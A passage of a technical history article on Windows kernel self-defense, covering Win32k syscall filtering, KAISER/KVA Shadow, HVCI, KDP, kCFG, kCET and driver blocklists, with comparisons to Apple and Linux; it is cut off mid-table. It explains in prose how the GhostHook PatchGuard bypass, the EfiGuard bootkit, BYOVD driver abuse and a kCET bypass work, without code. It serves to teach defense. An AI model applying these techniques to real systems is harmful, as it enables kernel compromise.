&lt;p&gt;In a single calendar year, three mutually independent breakthroughs reshaped kernel self-defense. June 2017: CyberArk&apos;s Kasif Dekel published GhostHook, an Intel-PT-based PatchGuard bypass that forced Microsoft&apos;s first public statement that PatchGuard is not a security boundary [@cyberark-ghosthook]. July 2017: Gruss et al. published &quot;KASLR is Dead: Long Live KASLR&quot; at ESSoS, proposing kernel page-table isolation as the structural answer [@gruss-kaiser-pdf]. October 2017: Windows 10 1709 shipped &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt;, the per-process, per-syscall allow-list designed for the Chrome and Edge renderer sandboxes [@ms-syscall-filter-policy]. Three teams, three mitigations, three facets of the same paradox.&lt;/p&gt;
&lt;h3&gt;Win32kSystemCallFilter (October 17, 2017)&lt;/h3&gt;
&lt;p&gt;The Windows 8 mitigation &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt; had been the right idea applied as a meat-axe: an opted-in process loses access to &lt;em&gt;every&lt;/em&gt; win32k system call. Windows 10 1709 introduced the surgical version. &lt;code&gt;PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY&lt;/code&gt; registers a per-process bitmap of system-defined &lt;code&gt;FilterId&lt;/code&gt; values that the process is allowed to call; everything outside the bitmap is denied [@ms-syscall-filter-policy]. The filter is applied via &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...)&lt;/code&gt; at &lt;code&gt;CreateProcess&lt;/code&gt; time -- not at runtime.&lt;/p&gt;

A Windows 10 1709+ process-mitigation policy (`PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY`, header `ntddk.h`) that registers a per-process bitmap of allowed system-defined `FilterId` values for win32k system calls. Calls outside the bitmap terminate the calling process. Used by the Chromium sandbox to constrain the win32k surface available to a renderer process [@ms-syscall-filter-policy] [@chromium-sandbox-doc].
&lt;p&gt;The &quot;at CreateProcess time, not at runtime&quot; detail is load-bearing. James Forshaw and Ivan Fratric&apos;s November 2016 Project Zero post &quot;Breaking the Chain&quot; documented how Edge&apos;s window-broker architecture, which applied syscall restrictions to a child process &lt;em&gt;after&lt;/em&gt; it had started, was subject to a window-of-opportunity race between the child&apos;s earliest syscall and the broker&apos;s policy application [@pz-breaking-chain]. If the policy is not in place by the time the first attacker-controlled syscall fires, the policy has not happened. The lesson the Windows 10 1709 design banked: mitigations belong on the &lt;code&gt;CreateProcess&lt;/code&gt; boundary, not on a later thread.&lt;/p&gt;

sequenceDiagram
    participant R as Renderer process (VTL0 user)
    participant SD as Syscall dispatcher (kernel)
    participant W as win32k handler
    participant EP as EPROCESS filter bitmap
    R-&amp;gt;&amp;gt;SD: NtUser/NtGdi syscall with FilterId N
    SD-&amp;gt;&amp;gt;EP: Consult per-process filter bitmap
    EP--&amp;gt;&amp;gt;SD: bit N set or unset
    alt FilterId allowed
        SD-&amp;gt;&amp;gt;W: Dispatch to win32k handler
        W--&amp;gt;&amp;gt;R: Return result
    else FilterId denied
        SD-&amp;gt;&amp;gt;R: Terminate process via fast-fail
    end
&lt;p&gt;The Forshaw / Fratric Edge race is a textbook case of why &quot;apply at runtime&quot; is a security anti-pattern for process mitigations. The Microsoft Edge of late 2016 used a sandbox model in which a renderer process started with limited restrictions and then upgraded itself to the full lockdown profile after initialisation. Forshaw and Fratric showed that an attacker who landed code execution before the upgrade completed -- a window of milliseconds -- could simply not upgrade. The lesson generalises beyond Edge: every per-process mitigation in modern Windows is applied at process creation time precisely so there is no window the attacker can race [@pz-breaking-chain].&lt;/p&gt;
&lt;p&gt;The cleanest way to see the two-mitigation contrast is side by side:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;&lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;&lt;code&gt;Win32kSystemCallFilter&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;Chromium&apos;s actual choice&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;First shipped&lt;/td&gt;
&lt;td&gt;Windows 8, 2012 [@ms-syscall-disable-policy]&lt;/td&gt;
&lt;td&gt;Windows 10 1709, October 2017 [@ms-syscall-filter-policy]&lt;/td&gt;
&lt;td&gt;Both, in different process types&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
&lt;td&gt;All-or-nothing&lt;/td&gt;
&lt;td&gt;Per-syscall allow-list&lt;/td&gt;
&lt;td&gt;Blanket-disable for non-UI; per-syscall for renderer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mitigation policy struct&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Composes both with LPAC privilege reduction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use case&lt;/td&gt;
&lt;td&gt;Non-UI broker processes (GPU broker, network process)&lt;/td&gt;
&lt;td&gt;Renderer processes that draw windows&lt;/td&gt;
&lt;td&gt;The renderer needs a constrained-but-non-zero win32k subset [@chromium-sandbox-doc]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Chromium sandbox composes the two mitigations with one more: the &lt;strong&gt;Less Privileged AppContainer&lt;/strong&gt; (LPAC). LPAC removes ambient access to user data, the network, and most named-object namespaces; &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; removes the syscall surface; &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt; applies to processes that need no UI at all. Defense in depth at the surface level rather than the structural level.&lt;/p&gt;

A Windows AppContainer variant introduced in Windows 10 that further restricts the ambient capabilities available to the contained process -- no access to user files, no access to most named objects, restricted ability to enumerate the system. Combined with `Win32kSystemCallFilter`, LPAC gives the Chromium renderer a process model in which both *what the renderer can ask the kernel to do* and *what the renderer can see in user mode* are deliberately narrow [@chromium-sandbox-doc].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; is the first mitigation in the 21-year arc that &lt;em&gt;deletes&lt;/em&gt; attack surface rather than defending it. PatchGuard and KASLR are kernel defenses: they live inside the kernel and protect kernel state. The win32k filter is a process-mitigation policy enforced by the kernel&apos;s system-call dispatcher at the syscall boundary. The protection is realised by &lt;em&gt;not letting the kernel be called&lt;/em&gt; rather than by checking the kernel&apos;s state afterwards. Once you see this shape, the rest of the modern Windows mitigation stack -- KDP, kCFG-with-VBS-bitmap, kCET -- becomes legible as variations on the same move: put the enforcement outside the attacker&apos;s reach.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;KAISER and the page-table split&lt;/h3&gt;
&lt;p&gt;In July 2017, Gruss et al. presented &quot;KASLR is Dead: Long Live KASLR&quot; at ESSoS [@gruss-kaiser-pdf]. The acronym was &lt;strong&gt;KAISER&lt;/strong&gt; -- Kernel Address Isolation to have Side-channels Efficiently Removed. The architecture is simple to describe, hard to engineer, and devastating to a side-channel attacker.&lt;/p&gt;
&lt;p&gt;A modern x64 kernel runs in the same virtual address space as the calling user process, distinguished by privilege bits in page-table entries. A syscall does not change the page tables; it only changes the privilege level. The TLB is therefore shared between user and kernel mappings, and side-channel attacks like Hund 2013 work by timing the resulting cache and TLB behaviour. KAISER&apos;s answer was to give each process &lt;em&gt;two&lt;/em&gt; sets of page tables: a &quot;user&quot; CR3 in which the kernel address space is &lt;em&gt;not mapped&lt;/em&gt;, and a &quot;kernel&quot; CR3 in which the full virtual address space is mapped. The syscall entry path switches from user CR3 to kernel CR3; the sysret path switches back. The kernel address space is not just unknown to a user-mode attacker -- it is structurally unreachable.&lt;/p&gt;

A design proposed by Gruss et al. (KAISER, ESSoS 2017) [@gruss-kaiser-pdf] in which each process has two page-table hierarchies: a user CR3 that does not map the kernel and a kernel CR3 that maps both. CR3 is switched on every syscall entry and exit. The kernel is no longer just *hard to find* (the KASLR posture); it is *unreachable* from user CR3 (the structural posture). Linux shipped KAISER as KPTI in early 2018; Microsoft shipped a re-engineered variant as KVA Shadow [@ms-kva-shadow-blog].

sequenceDiagram
    participant U as User-mode thread
    participant CPU as CPU CR3
    participant K as Kernel
    U-&amp;gt;&amp;gt;CPU: syscall (SYSCALL instruction)
    CPU-&amp;gt;&amp;gt;CPU: Switch CR3 from user to kernel
    CPU-&amp;gt;&amp;gt;K: Kernel now mapped, enter system service
    K-&amp;gt;&amp;gt;K: Handle request
    K-&amp;gt;&amp;gt;CPU: SYSRET
    CPU-&amp;gt;&amp;gt;CPU: Switch CR3 back to user
    CPU-&amp;gt;&amp;gt;U: Return to user mode, kernel unmapped
&lt;p&gt;The Gruss paper landed six months before anyone knew why it mattered. Then, on January 3, 2018, Jann Horn published &quot;Reading privileged memory with a side-channel&quot; on Project Zero [@pz-meltdown-post], the same day the academic teams (Lipp et al., independently) published the Meltdown disclosure [@usenix-lipp-meltdown]. Meltdown -- CVE-2017-5754, &quot;rogue data cache load&quot; -- exploited transient out-of-order execution on Intel CPUs to read kernel memory from user mode. The only structural fix was to ensure the kernel pages were not present in the user-mode page table. KAISER&apos;s design, drafted as a generic side-channel countermeasure, was suddenly Meltdown&apos;s required mitigation.&lt;/p&gt;
&lt;h3&gt;GhostHook and the formal admission&lt;/h3&gt;
&lt;p&gt;In June 2017, Kasif Dekel published GhostHook [@cyberark-ghosthook]. The mechanism is elegant. Intel Processor Trace (Intel PT) is a CPU feature for low-overhead recording of control flow, designed for performance analysis and debugging. The trace is written to a Table of Physical Addresses (ToPA), and when a configured ToPA region fills, the CPU raises a performance-monitoring interrupt (PMI). The OS&apos;s PMI handler is a function pointer. PMI handlers run in kernel mode, with full kernel privilege. GhostHook configured Intel PT with a tiny ToPA covering an address near &lt;code&gt;IA32_LSTAR&lt;/code&gt; (the syscall entry MSR), arranged for the buffer to fill immediately, and registered an attacker-controlled PMI handler. Every kernel transition fired the PMI; the attacker&apos;s handler ran first. PatchGuard does not enumerate Intel PT. By design.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response, as reported in the CyberArk write-up, was the formal end of an eleven-year ambiguity. PatchGuard is &quot;considered an in-depth security feature&quot; but not a security boundary; the GhostHook bypass would &quot;be considered for a future version of Windows&quot; but did not warrant an out-of-band fix [@cyberark-ghosthook]. The Microsoft position aligns with the Security Servicing Criteria: admin-to-kernel is not a security boundary, and an attacker who has already reached kernel mode (the precondition for installing a GhostHook-style PMI handler) is outside the scope of what PatchGuard exists to prevent [@ms-servicing-criteria].&lt;/p&gt;

While the technique was found to bypass PatchGuard, Microsoft has graciously agreed to consider [the issue] for a future version of Windows. As such, no immediate risk exists for customers. -- Microsoft response to GhostHook, June 2017 [@cyberark-ghosthook].
&lt;p&gt;The three breakthroughs of 2017 were structurally aligned. &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; deleted the most-vulnerable syscall surface from sandboxed renderers. KAISER&apos;s page-table split made KASLR&apos;s probabilistic defense obsolete and structurally unreachable. GhostHook forced the public admission that the same-privilege class of defense has a ceiling Microsoft already knew about. And then, on the morning of January 3, 2018, the academic paper of six months earlier became an emergency engineering deliverable.&lt;/p&gt;
&lt;h2&gt;6. State of the art: KDP, KVA Shadow, kCFG, kCET, and the Secure Kernel shift (2018 -- 2026)&lt;/h2&gt;
&lt;p&gt;January 3, 2018: Meltdown&apos;s public disclosure forces every major operating system to ship page-table isolation within weeks [@pz-meltdown-post]. Microsoft&apos;s response, &lt;strong&gt;KVA Shadow&lt;/strong&gt;, ships in the Windows 10 1709 cumulative security update the same day. The engineering write-up is bylined to Ken Johnson of the Microsoft Security Response Center [@ms-kva-shadow-blog]. The same Ken Johnson who, twelve years earlier, co-authored &lt;em&gt;Bypassing PatchGuard on Windows x64&lt;/em&gt; under the name Skywing [@uninformed-v3-archive]. The offensive-research outsider had become the bylined Microsoft defender. The same loop was about to close on the architectural question: &lt;em&gt;where, exactly, does the defense live?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Ken Johnson / Skywing trajectory -- offensive Uninformed paper in 2005, the bylined MSRC blog post in 2018, twelve years later -- is the cleanest single illustration of the offensive-research-to-Microsoft pattern. He is engineering credit attributed to Ken Johnson on the MSRC byline; the offensive identity is widely known but not asserted by Microsoft. Either reading of the byline is valid; the structural point is that the same person whose 2005 paper identified the architectural ceiling of CPL=0 obfuscation later shipped the cross-privilege answer for Meltdown [@uninformed-v3-archive] [@ms-kva-shadow-blog].&lt;/p&gt;
&lt;h3&gt;KVA Shadow: the productisation of KAISER&lt;/h3&gt;
&lt;p&gt;KVA Shadow is the Windows productisation of KAISER. Two CR3-loadable page tables per process: a user-mode shadow that does not map most of the kernel, and a kernel-mode page table that does. CR3 is switched on every syscall entry and exit. The kernel address space is unmapped from user CR3 [@ms-kva-shadow-blog]. The structural Meltdown fix is exact: a Meltdown-class transient read of a kernel address from user mode now hits an unmapped page-table entry and raises a fault before any cached side-channel evidence is produced.&lt;/p&gt;
&lt;p&gt;Two things to be precise about. First, KVA Shadow addresses &lt;strong&gt;Variant 3&lt;/strong&gt; (Meltdown, CVE-2017-5754) only. Spectre Variant 1 (CVE-2017-5753), Variant 2 (CVE-2017-5715), and Variant 4 (Speculative Store Bypass) require their own mitigations (microcode updates, retpoline, IBRS / IBPB, SSBD); KVA Shadow does nothing for them [@usenix-lipp-meltdown]. Second, the performance cost of the CR3-switch on every syscall is real -- Fortinet&apos;s analysis of the KVA Shadow build measured significant slowdowns for syscall-heavy workloads, mitigated on newer CPUs by Process-Context Identifiers (PCID) that keep TLB entries valid across CR3 switches [@fortinet-kva-shadow].&lt;/p&gt;
&lt;h3&gt;HVCI: the VTL1 enabler&lt;/h3&gt;
&lt;p&gt;Hypervisor-Protected Code Integrity (HVCI) is not, strictly, a kernel defense -- it is the foundation everything else in the modern stack stands on. HVCI uses Virtualization-Based Security (VBS) to run a small Secure Kernel in Virtual Trust Level 1 (VTL1), one privilege level above the NT kernel in VTL0. The Secure Kernel manages the Second-Level Address Translation (SLAT) page tables -- Intel EPT or AMD NPT -- that mediate physical memory access for the NT kernel. With HVCI on, kernel pages are managed W^X (writable XOR executable): a kernel-mode driver attempting to make a writable page executable triggers a SLAT fault that VTL1 catches.&lt;/p&gt;

A Windows architecture in which the hypervisor partitions the system into two Virtual Trust Levels. VTL0 hosts the normal NT kernel, drivers, and user-mode processes. VTL1 hosts a Secure Kernel and a small set of trustlets that enforce policy on VTL0. Cross-VTL transitions are mediated by the hypervisor; a VTL0 kernel-mode attacker cannot reach VTL1, even with arbitrary kernel write. VBS is the architectural primitive that makes HVCI, KDP, and kCFG-with-VBS-bitmap possible [@ms-kdp-blog].
&lt;p&gt;For this article HVCI is the cross-cutting dependency: it is what makes KDP and the VBS-protected kCFG bitmap work. Once you have a hypervisor enforcing SLAT on the NT kernel, every defense you want to anchor &lt;em&gt;outside&lt;/em&gt; the NT kernel has a home.&lt;/p&gt;
&lt;h3&gt;KDP: static and dynamic kernel data protection&lt;/h3&gt;
&lt;p&gt;Microsoft announced Kernel Data Protection on July 8, 2020, with Windows 10 version 2004 [@ms-kdp-blog]. Two flavours.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Static KDP&lt;/strong&gt; uses the &lt;code&gt;MmProtectDriverSection&lt;/code&gt; API, called from &lt;code&gt;DriverEntry&lt;/code&gt;, to mark a section of the driver&apos;s image as read-only for the rest of the kernel&apos;s lifetime. The intended use is for tables of policy data the driver expects never to modify after initialisation: function-pointer arrays, configuration constants, signed policy blobs. Once &lt;code&gt;MmProtectDriverSection&lt;/code&gt; returns, the section&apos;s pages are tagged read-only in the VTL1-managed SLAT; a VTL0 kernel-mode attempt to write them takes a hardware page fault that VTL0 has no way to relax.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic KDP&lt;/strong&gt; is for runtime-allocated state. The canonical API is &lt;code&gt;ExAllocatePool3&lt;/code&gt;, called with a &lt;code&gt;POOL_EXTENDED_PARAMETER&lt;/code&gt; array containing a &lt;code&gt;POOL_EXTENDED_PARAMS_SECURE_POOL&lt;/code&gt; extended parameter [@ms-kdp-blog]. The flags &lt;code&gt;SECURE_POOL_FLAGS_FREEABLE&lt;/code&gt; (1) and &lt;code&gt;SECURE_POOL_FLAG_MODIFIABLE&lt;/code&gt; (2) control whether the allocation can later be freed and whether further protected modifications are permitted. The secure-pool extension routes the allocation through the Secure Kernel; the resulting memory is verified by VTL1 and protected by SLAT.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; KDP does &lt;em&gt;not&lt;/em&gt; automatically protect &quot;all kernel memory.&quot; It protects exactly the memory a driver author opts in to protect via &lt;code&gt;MmProtectDriverSection&lt;/code&gt; (static) or &lt;code&gt;ExAllocatePool3&lt;/code&gt; with the secure-pool extension (dynamic) [@ms-kdp-blog]. Memory allocated through the normal &lt;code&gt;ExAllocatePool2&lt;/code&gt; path is &lt;em&gt;not&lt;/em&gt; KDP-protected. A defender architecting around KDP must explicitly opt the data they care about into the secure pool; the protection is targeted, not blanket.&lt;/p&gt;
&lt;/blockquote&gt;

A Microsoft kernel-memory protection introduced with Windows 10 version 2004 (July 2020) that allows drivers to mark sections of kernel memory as read-only and have the protection enforced by the Secure Kernel in VTL1 via the SLAT page tables. Static KDP uses `MmProtectDriverSection`; Dynamic KDP uses `ExAllocatePool3` with a `POOL_EXTENDED_PARAMS_SECURE_POOL` extended parameter passed via `POOL_EXTENDED_PARAMETER`. The enforcement lives at a privilege level the VTL0 attacker cannot reach [@ms-kdp-blog].
&lt;p&gt;The Microsoft launch blog makes the architectural point in one sentence: &lt;em&gt;&quot;the memory managed by KDP is always verified by the secure kernel (VTL1) and protected using SLAT tables by the hypervisor&quot;&lt;/em&gt; [@ms-kdp-blog]. This is the first kernel self-defense mitigation in the Windows lineage whose enforcement is &lt;em&gt;structurally&lt;/em&gt; outside the NT kernel. A VTL0 attacker with arbitrary kernel write &lt;em&gt;cannot&lt;/em&gt; relax the SLAT entry that protects a KDP-tagged page, because the SLAT entry is managed by VTL1, and VTL1 is not in VTL0&apos;s address space.&lt;/p&gt;

flowchart TD
    A[VTL0 NT kernel plus attacker driver] --&amp;gt;|attempt write to KDP-protected page| B[CPU memory access]
    B --&amp;gt; C[SLAT page table consulted]
    C --&amp;gt; D{SLAT entry writable for VTL0}
    D -- no, RO by VTL1 --&amp;gt; E[Hardware EPT or NPT fault]
    D -- yes --&amp;gt; F[Write succeeds]
    E --&amp;gt; G[Secure Kernel in VTL1 receives fault]
    G --&amp;gt; H[VTL0 attacker has no path to relax SLAT entry]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The canonical pre-boot PatchGuard bypass, EfiGuard, is a UEFI bootkit that patches the loaded kernel image to disable PatchGuard and DSE before the kernel runs [@mattiwatti-efiguard]. It works precisely because PatchGuard, DSE, and the kernel image all live in VTL0 -- a pre-boot agent has the same architectural reach. But once the system boots into a VBS-enabled configuration, the SLAT enforcement lives in VTL1, and the launching firmware does &lt;em&gt;not&lt;/em&gt; have VTL1&apos;s privileges. The same attacker that defeats PatchGuard at the kernel level cannot defeat HVCI from the same vantage. This is the cleanest cross-mitigation demonstration that the architectural-layer choice -- &quot;which privilege level does the defense live at?&quot; -- is the load-bearing variable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;kCFG: forward-edge integrity&lt;/h3&gt;
&lt;p&gt;Control Flow Guard (CFG) is Microsoft&apos;s compiler-assisted forward-edge CFI. Every indirect call is replaced by a check against a bitmap of valid call targets; an invalid target raises a fast-fail [@ms-cfg]. The kernel variant -- &lt;strong&gt;kCFG&lt;/strong&gt; -- is enabled by &lt;code&gt;/guard:cf&lt;/code&gt; and protects indirect calls in &lt;code&gt;ntoskrnl&lt;/code&gt; and CFG-compiled drivers. With HVCI on, the CFG bitmap is stored in VTL1-protected memory; a VTL0 attacker who can write arbitrary kernel pages still cannot tamper with the bitmap. kCFG defeats jump-oriented and call-oriented programming (JOP / COP) against the forward edge. It does nothing for the backward edge.&lt;/p&gt;
&lt;h3&gt;kCET: backward-edge integrity in hardware&lt;/h3&gt;
&lt;p&gt;Kernel-mode hardware-enforced stack protection (informally &lt;strong&gt;kCET&lt;/strong&gt;, formally documented as &quot;Kernel Mode Hardware-enforced Stack Protection&quot;) closes the backward edge using the Intel CET and AMD Shadow Stack hardware features [@ms-kernel-mode-hsp]. A CPU-maintained shadow stack records every &lt;code&gt;CALL&lt;/code&gt; return address; every &lt;code&gt;RET&lt;/code&gt; validates the popped address against the shadow stack and fast-fails on mismatch. The shadow-stack pages are marked Shadow Stack in the kernel-mode PTE, which the CPU enforces directly; with VBS on, the Secure Kernel additionally locks the shadow-stack mappings against VTL0 write.&lt;/p&gt;
&lt;p&gt;kCET requires Intel 11th-generation Tiger Lake or later, or AMD Zen 3 or later, plus VBS and HVCI [@ms-kernel-mode-hsp]. It is off-by-default on Windows Server 2025 because enabling it system-wide requires every loaded driver to be compiled with the &lt;code&gt;/CETCOMPAT&lt;/code&gt; flag; a single non-&lt;code&gt;/CETCOMPAT&lt;/code&gt; driver disables kCET for the entire system at load time. As of June 2026, the rollout is gated on driver vendor adoption.&lt;/p&gt;
&lt;p&gt;An adjacent technique worth knowing about by name is &lt;strong&gt;eXtended Flow Guard (XFG)&lt;/strong&gt;. XFG augmented kCFG&apos;s bitmap-membership check with a per-function type-derived 64-bit hash compared at the call site -- a defense that detects not just &quot;is this target valid?&quot; but &quot;is this target the &lt;em&gt;right&lt;/em&gt; target for this call&apos;s signature?&quot; XFG was prototyped in MSVC and partially shipped on Windows 10 Insider builds, but the instrumentation never reached full inbox-kernel coverage and the feature is no longer Microsoft&apos;s strategic investment direction. The shipping equivalent on 2026 hardware is kCET for the backward edge plus kCFG for the forward edge.&lt;/p&gt;
&lt;p&gt;Connor McGarr&apos;s Black Hat USA 2025 deck, &quot;Out of Control: KCFG and KCET,&quot; documents the 2026 frontier of kCET bypasses -- an &lt;code&gt;iretq&lt;/code&gt;-frame corruption combined with a write-what-where primitive can pivot around the shadow stack [@mcgarr-bh25-blackhat] [@mcgarr-km-shadow] [@mcgarr-github]. The bypass requires the attacker to already control a kernel-mode write primitive and several CFG-clean targets, which is exactly the precondition KDP, kCFG, and HVCI are designed to make hard.&lt;/p&gt;
&lt;h3&gt;ARM64 Pointer Authentication&lt;/h3&gt;
&lt;p&gt;The recurring framing of PatchGuard as &quot;x64-only&quot; is documentation-accurate but deployment-incomplete. In 2026, PatchGuard, kCFG, and Pointer Authentication Codes (PAC) ship on 64-bit ARM Windows as well as x64. PAC is an ARMv8.3-A feature in which a tag computed over a pointer value and a per-process key is stored in the unused high bits of the pointer; the CPU validates the tag on dereference. PAC closes a different class of pointer-corruption attacks than kCFG/kCET. The structural point is that the kernel self-defense investment is fully cross-architecture, not x64-only.&lt;/p&gt;
&lt;h3&gt;The Microsoft Vulnerable Driver Blocklist&lt;/h3&gt;
&lt;p&gt;The reactive answer to BYOVD is the &lt;strong&gt;Microsoft Recommended Driver Block Rules&lt;/strong&gt; -- a list of known-vulnerable signed third-party drivers that Windows refuses to load when App Control for Business (formerly WDAC) is enabled [@ms-driver-block-rules]. The list is default-on with Memory Integrity, Smart App Control, and S-mode since Windows 11 22H2 and is updated through Windows Update. Verification on a modern system: &lt;code&gt;CiTool --list-policies&lt;/code&gt; and look for a policy whose friendly name is &lt;code&gt;Microsoft Windows Driver Policy&lt;/code&gt; and &lt;code&gt;Is Currently Enforced: true&lt;/code&gt;. The blocklist is the structural answer to the Uroburos pattern -- Microsoft cannot prevent any signed third-party driver from having a write-primitive bug, but they can refuse to load specific drivers known to have shipped such bugs.&lt;/p&gt;

The attack pattern in which an attacker, having reached administrator privilege, installs a *legitimate* signed third-party kernel driver known to contain a privilege-escalation vulnerability, then exploits that vulnerability to obtain arbitrary kernel-mode primitives. The Uroburos VBoxDrv abuse [@gdata-uroburos-blog] is the canonical 2011 example; the Microsoft Recommended Driver Block Rules are the 2024+ reactive answer [@ms-driver-block-rules].
&lt;h3&gt;Synthesis&lt;/h3&gt;
&lt;p&gt;By 2026, the Windows kernel self-defense stack is no longer a single mitigation; it is a &lt;em&gt;stack&lt;/em&gt; organised by where the defense actually runs. The 21-year trajectory now resolves into a single thesis: every generation has been a partial answer to the same-privilege paradox, and Microsoft&apos;s strategy has progressively migrated the defense out of the kernel -- first into instruction-level obfuscation, then into address-space tricks, then into VBS-anchored isolation, and finally into attack-surface deletion. Before we name that thesis formally, it is worth asking: what did the rest of the industry do?&lt;/p&gt;
&lt;h2&gt;7. What the rest of the industry did differently&lt;/h2&gt;
&lt;p&gt;The Microsoft answer to the same-privilege paradox -- twenty-one years of compounding investment in same-privilege deterrents while progressively shifting enforcement to VTL1 -- is not the only answer. Apple and the Linux mainline community took architecturally opposite paths, each correct for a different platform constraint.&lt;/p&gt;
&lt;h3&gt;Apple: push the defense into silicon&lt;/h3&gt;
&lt;p&gt;Apple&apos;s answer was to put enforcement &lt;em&gt;below&lt;/em&gt; the kernel, into hardware Apple controls end-to-end. On Apple Silicon, the Kernel Text Read-only Region (KTRR) is hardware-enforced via the AMCC (Apple Memory Cache Controller). At boot, after the kernel is mapped and before user code runs, the kernel text region is locked read-only at the memory-controller level. Once locked, no software running at &lt;em&gt;any&lt;/em&gt; privilege level can modify it -- not the kernel itself, not a kernel extension, not a hypothetical EL2 hypervisor [@siguza-ktrr].&lt;/p&gt;

Apple Silicon&apos;s hardware-enforced read-only kernel text region. After boot, the kernel image is locked via the AMCC memory controller; no software at any privilege level can write to the protected region for the lifetime of that boot [@siguza-ktrr]. Apple&apos;s architectural answer to the same-privilege paradox: push the defense *below* the kernel, into hardware Apple controls.
&lt;p&gt;The corollary is that Apple&apos;s hardware control allows them to make a software move Microsoft cannot. Apple deprecated third-party Kernel Extensions (KEXTs) in favour of user-mode DriverKit and Endpoint Security, structurally removing the BYOVD class from the platform.Apple&apos;s deprecation of third-party KEXTs began in macOS Catalina (2019) with a deprecation warning, escalated to &quot;system extensions&quot; requiring user approval and reduced kernel-mode footprint, and reached a near-complete migration target on Apple Silicon. The architectural cost is that legitimate device-driver vendors and EDR products had to rebuild their stacks on top of user-mode brokers and Apple-curated APIs; the architectural benefit is that a 2024-style CrowdStrike Falcon kernel-driver outage is structurally not possible on Apple Silicon, because the EDR product runs in user mode against an Endpoint Security framework that mediates the kernel for it.&lt;/p&gt;
&lt;h3&gt;Linux mainline: privilege reduction, not integrity monitoring&lt;/h3&gt;
&lt;p&gt;The mainline Linux community&apos;s strategy is structurally the opposite of Microsoft&apos;s: do not invest in same-privilege deterrents at all; invest in privilege reduction and surface isolation instead. LKRG (Linux Kernel Runtime Guard, maintained by Openwall) is the closest functional analogue to PatchGuard [@openwall-lkrg-page] [@openwall-lkrg-github]. Its own documentation describes it as &quot;bypassable by design&quot; -- an openly-acknowledged same-privilege paradox.LKRG&apos;s frank framing is unusual in the security tools space. The project explicitly tells operators that LKRG is a hardening layer that raises the engineering cost of common kernel rootkit techniques, not a security boundary, and that a determined kernel-mode attacker can defeat it. This is the same architectural truth Skywing made in 2005 and that Microsoft published in the Servicing Criteria a decade later, stated upfront in a project README.&lt;/p&gt;
&lt;p&gt;Beyond LKRG, the mainline mechanisms have a recurring structural shape. Each row of the table below is structurally a &lt;em&gt;privilege-reduction&lt;/em&gt; or &lt;em&gt;surface-removal&lt;/em&gt; mechanism rather than a same-privilege integrity check.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Linux mechanism&lt;/th&gt;
&lt;th&gt;Status (as of June 2026)&lt;/th&gt;
&lt;th&gt;What it protects&lt;/th&gt;
&lt;th&gt;Windows analogue&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Lockdown LSM&lt;/td&gt;
&lt;td&gt;Mainline since 5.4 (2019)&lt;/td&gt;
&lt;td&gt;Restricts root&apos;s ability to modify the running kernel&lt;/td&gt;
&lt;td&gt;Driver Signature Enforcement plus HVCI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FG-KASLR&lt;/td&gt;
&lt;td&gt;Out-of-tree&lt;/td&gt;
&lt;td&gt;Per-function rather than per-image randomisation&lt;/td&gt;
&lt;td&gt;No direct analogue; closest is kASLR base randomisation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clang KCFI (&lt;code&gt;-fsanitize=kcfi&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Mainline since 6.1 (Dec 2022)&lt;/td&gt;
&lt;td&gt;Forward-edge CFI for the Linux kernel&lt;/td&gt;
&lt;td&gt;kCFG&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shadow Call Stack (ARM64)&lt;/td&gt;
&lt;td&gt;Mainline since 5.8 (2020)&lt;/td&gt;
&lt;td&gt;Backward-edge integrity on ARM64&lt;/td&gt;
&lt;td&gt;kCET (on x64 / AMD), SCS on ARM64 Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;seccomp-bpf&lt;/td&gt;
&lt;td&gt;Mainline since 3.5 (2012)&lt;/td&gt;
